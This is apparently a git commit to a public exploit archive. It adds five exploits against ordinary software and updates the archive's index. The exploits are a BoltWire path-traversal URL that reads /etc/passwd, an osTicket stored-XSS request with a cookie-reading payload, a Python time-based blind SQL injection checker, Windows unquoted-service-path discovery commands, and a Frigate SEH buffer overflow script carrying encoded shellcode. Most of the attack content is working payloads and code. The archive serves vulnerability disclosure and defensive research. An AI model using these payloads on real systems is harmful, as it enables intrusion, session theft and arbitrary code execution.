DB: 2020-05-05

5 changes to exploits/shellcodes Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path Frigate 3.36 - Buffer Overflow (SEH) BoltWire 6.03 - Local File Inclusion osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting addressbook 9.0.0.1 - 'id' SQL Injection
2020-05-05 05:01:46 +00:00 · 2020-05-05 05:01:46 +00:00 · fd7a524bf8
commit fd7a524bf8
parent ba366e9374
6 changed files with 210 additions and 0 deletions
--- a/exploits/php/webapps/48411.txt
+++ b/exploits/php/webapps/48411.txt
@ -0,0 +1,31 @@
+# Exploit Title: BoltWire 6.03 - Local File Inclusion
+# Date: 2020-05-02
+# Exploit Author: Andrey Stoykov
+# Vendor Homepage: https://www.boltwire.com/
+# Software Link: https://www.boltwire.com/downloads/go&v=6&r=03
+# Version: 6.03
+# Tested on: Ubuntu 20.04 LAMP
+
+
+LFI:
+
+Steps to Reproduce:
+
+1) Using HTTP GET request browse to the following page, whilst being authenticated user.
+http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd
+
+Result
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+[SNIPPED]
--- a/exploits/php/webapps/48413.txt
+++ b/exploits/php/webapps/48413.txt
@ -0,0 +1,41 @@
+# Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
+# Author: Mehmet Kelepce / Gais Cyber Security
+# Date : 2020-03-24
+# Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
+# Vendor: http://osticket.com
+# Remotely Exploitable: Yes
+# Dynamic Coding Language: PHP
+# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)
+
+## this vulnerability was found by examining the source code.
+
+PoC : Ticket SLA Plan Name - HTTP POST REQUEST
+##########################################################
+POST /upload/scp/slas.php?id=1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/upload/scp/slas.php?id=1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 196
+Connection: close
+Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
+Upgrade-Insecure-Requests: 1
+
+submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=
+
+Vulnerable parameter: name
+Parameter file: /scp/slass.php
+
+I used the name of the SLA for any ticket.
+
+## Risk : cookie information of the target user is obtained.
+
+# Bu e-posta mesajı ve eklerinde yer alan içerikler gönderildiği kişi ya da firmaya özeldir. Ayrıca hukuken de gizli olabilir. Hiçbir şekilde üçüncü kişilere açıklanamaz ve yayınlanamaz. 
+# Eğer bu mesajı hataen aldıysanız lütfen durumu gönderen kişiye derhal bildiriniz ve mesajı sisteminizden siliniz. Mesajın yetkili alıcısı değilseniz hiçbir kısmını kopyalayamaz, başkasına 
+# gönderemez veya hiçbir şekilde bu mesajı kullanamazsınız. Eğer mesajın yetkili alıcısı veya yetkili alıcısına iletmekten sorumlu kişi siz değilseniz, lütfen mesajı sisteminizden siliniz 
+# ve göndereni uyarınız. İnternet iletişiminde tam güvenlik ve hatasız gönderim garanti edilemeyeceğinden; mesajın yerine ulaşmaması, geç ulaşması ya da içeriğinin bozulması gibi problemler 
+# de oluşabilir. Gönderen ve GAİS (Gais Siber Güvenlik Teknolojileri Ltd. Şti.) bu mesajın içerdiği bilgilerin doğruluğu, bütünlüğü ve güncelliği konusunda bir garanti vermemektedir. 
+# Mesajın içeriğinden, iletilmesinden, alınmasından, saklanmasından, gizliliğinin korunmamasından, virüs içermesinden ve sisteminizde yaratabileceği olası zararlardan GAİS sorumlu tutulamaz.
--- a/exploits/php/webapps/48416.txt
+++ b/exploits/php/webapps/48416.txt
@ -0,0 +1,31 @@
+# Title: addressbook 9.0.0.1 - 'id' SQL Injection 
+# Date: 2020-04-01
+# Author: David Velazquez a.k.a. d4sh&r000
+# vulnerable application:  https://sourceforge.net/projects/php-addressbook/files/latest/download
+# vulnerable version: 9.0.0.1
+# Discription: addressbook 9.0.0.1 time-based blind SQL injection 
+# Tested On: Ubuntu Server 20.04 LTS
+# Platform: PHP
+# Type: webapp
+
+# Use:
+# addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1'
+
+
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+import sys
+import requests
+
+def isVulnerable(URL):
+    """Check if the URL is vulnerable to ime-based blind SQL injection"""
+    response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
+    s=response.elapsed.total_seconds()
+    if s>5:#I put a sleep sentence to test the bug
+      sys.stdout.write('[+] Aplication is vulnerable!!!\n')
+    else:
+      sys.stdout.write('[+] Aplication NOT vulnerable\n')    
+    
+if __name__ == "__main__":
+    isVulnerable(sys.argv[1])
--- a/exploits/windows/local/48414.txt
+++ b/exploits/windows/local/48414.txt
@ -0,0 +1,33 @@
+# Exploit Title: Outline Service 1.3.3  - 'Outline Service ' Unquoted Service Path
+# Discovery by: Minh Tuan - SunCSR
+# Discovery Date: 2020-05-03
+# Vendor Homepage: https://getoutline.org/vi/home
+# Software Link : https://raw.githubusercontent.com/Jigsaw-Code/outline-releases/master/client/stable/Outline-Client.exe
+# Tested Version: 1.3.3
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363
+
+# Step to discover Unquoted Service Path: 
+
+C:\Users\minht>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+OutlineService      OutlineService      C:\Program Files (x86)\Outline\OutlineService.exe
+
+C:\Users\minht>sc qc OutlineService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: OutlineService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Outline\OutlineService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : OutlineService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+# Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
--- a/exploits/windows/local/48415.py
+++ b/exploits/windows/local/48415.py
@ -0,0 +1,69 @@
+# Exploit Title: Frigate 3.36 - Buffer Overflow (SEH)
+# Exploit Author: Xenofon Vassilakopoulos
+# Date: 2020-05-03
+# Version: 3.36
+# Vendor Homepage: http://www.Frigate3.com/
+# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
+# Tested on: Windows 7 Professional SP1 x86
+
+# Steps to reproduce :
+# 1. generate the test.txt using this exploit 
+# 2. copy the contents of the test.txt to clipboard 
+# 3. open Frigate3 then go to Disk -> Find Computer 
+# 4. paste the contents to computer name  
+# 5. calculator will execute 
+
+
+import struct
+
+filename = 'test.txt'
+junk = "A"*4112 
+nseh =  "\xeb\x1A\x90\x90"
+seh = struct.pack('L',0x40171c45) # pop esi # pop ebx # ret
+nop="\x90"*18
+junk2 =  "\x71\x71\x90\x90"
+
+
+#msfvenom -a x86 --platform windows -p windows/exec  CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python
+buf =  b""
+buf += b"\x89\xe7\xda\xc7\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
+buf += b"\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
+buf += b"\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
+buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+buf += b"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x68\x68\x6d\x52"
+buf += b"\x77\x70\x63\x30\x73\x30\x35\x30\x6d\x59\x38\x65\x34"
+buf += b"\x71\x69\x50\x70\x64\x4c\x4b\x56\x30\x44\x70\x6e\x6b"
+buf += b"\x36\x32\x74\x4c\x6c\x4b\x30\x52\x76\x74\x4e\x6b\x71"
+buf += b"\x62\x51\x38\x64\x4f\x78\x37\x42\x6a\x45\x76\x76\x51"
+buf += b"\x4b\x4f\x6e\x4c\x47\x4c\x43\x51\x63\x4c\x44\x42\x36"
+buf += b"\x4c\x61\x30\x6f\x31\x38\x4f\x56\x6d\x45\x51\x69\x57"
+buf += b"\x38\x62\x6c\x32\x63\x62\x33\x67\x4e\x6b\x76\x32\x42"
+buf += b"\x30\x4e\x6b\x50\x4a\x75\x6c\x4c\x4b\x42\x6c\x57\x61"
+buf += b"\x51\x68\x6a\x43\x73\x78\x63\x31\x6a\x71\x43\x61\x6e"
+buf += b"\x6b\x73\x69\x37\x50\x35\x51\x78\x53\x6e\x6b\x42\x69"
+buf += b"\x65\x48\x4a\x43\x36\x5a\x51\x59\x4e\x6b\x46\x54\x4c"
+buf += b"\x4b\x53\x31\x69\x46\x70\x31\x49\x6f\x4c\x6c\x4f\x31"
+buf += b"\x48\x4f\x66\x6d\x45\x51\x4f\x37\x66\x58\x49\x70\x63"
+buf += b"\x45\x5a\x56\x36\x63\x73\x4d\x7a\x58\x65\x6b\x63\x4d"
+buf += b"\x34\x64\x44\x35\x4a\x44\x63\x68\x4c\x4b\x33\x68\x44"
+buf += b"\x64\x66\x61\x38\x53\x52\x46\x4e\x6b\x34\x4c\x50\x4b"
+buf += b"\x6e\x6b\x43\x68\x75\x4c\x76\x61\x6e\x33\x4e\x6b\x55"
+buf += b"\x54\x6e\x6b\x53\x31\x38\x50\x4f\x79\x43\x74\x37\x54"
+buf += b"\x76\x44\x51\x4b\x31\x4b\x53\x51\x36\x39\x50\x5a\x32"
+buf += b"\x71\x79\x6f\x79\x70\x43\x6f\x53\x6f\x52\x7a\x4e\x6b"
+buf += b"\x67\x62\x48\x6b\x4e\x6d\x43\x6d\x72\x4a\x47\x71\x6e"
+buf += b"\x6d\x4d\x55\x4e\x52\x57\x70\x37\x70\x67\x70\x62\x70"
+buf += b"\x32\x48\x70\x31\x6e\x6b\x32\x4f\x6c\x47\x39\x6f\x69"
+buf += b"\x45\x4d\x6b\x58\x70\x4e\x55\x4d\x72\x51\x46\x30\x68"
+buf += b"\x4e\x46\x6f\x65\x4d\x6d\x6d\x4d\x6b\x4f\x39\x45\x45"
+buf += b"\x6c\x33\x36\x53\x4c\x37\x7a\x4b\x30\x49\x6b\x49\x70"
+buf += b"\x32\x55\x45\x55\x6d\x6b\x33\x77\x44\x53\x42\x52\x50"
+buf += b"\x6f\x43\x5a\x67\x70\x33\x63\x4b\x4f\x59\x45\x42\x43"
+buf += b"\x65\x31\x52\x4c\x45\x33\x35\x50\x41\x41"
+
+payload = junk + nseh + seh + nop + junk2 + buf
+
+print "[+] Creating file %s" % filename
+with open(filename, 'w') as f:
+    f.write(payload)
+print "    File created, wrote %d bytes to file" % len(payload)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11064,6 +11064,8 @@ id,file,description,date,author,type,platform,port
 48397,exploits/windows/local/48397.txt,"Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)",2020-04-29,Vulnerability-Lab,local,windows,
 48398,exploits/windows/local/48398.txt,"EmEditor 19.8 - Insecure File Permissions",2020-04-29,SajjadBnd,local,windows,
 48400,exploits/windows/local/48400.txt,"Druva inSync Windows Client 6.5.2 - Local Privilege Escalation",2020-04-29,"Chris Lyne",local,windows,
+48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3  - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,
+48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42644,3 +42646,6 @@ id,file,description,date,author,type,platform,port
 48406,exploits/ios/webapps/48406.txt,"HardDrive 2.1 for iOS - Arbitrary File Upload",2020-05-01,Vulnerability-Lab,webapps,ios,
 48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,
 48409,exploits/php/webapps/48409.txt,"Online Scheduling System 1.0 - Authentication Bypass",2020-05-01,boku,webapps,php,
+48411,exploits/php/webapps/48411.txt,"BoltWire 6.03 - Local File Inclusion",2020-05-04,"Andrey Stoykov",webapps,php,
+48413,exploits/php/webapps/48413.txt,"osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting",2020-05-04,"Mehmet Kelepçe",webapps,php,
+48416,exploits/php/webapps/48416.txt,"addressbook 9.0.0.1 - 'id' SQL Injection",2020-05-04,"David Velazquez",webapps,php,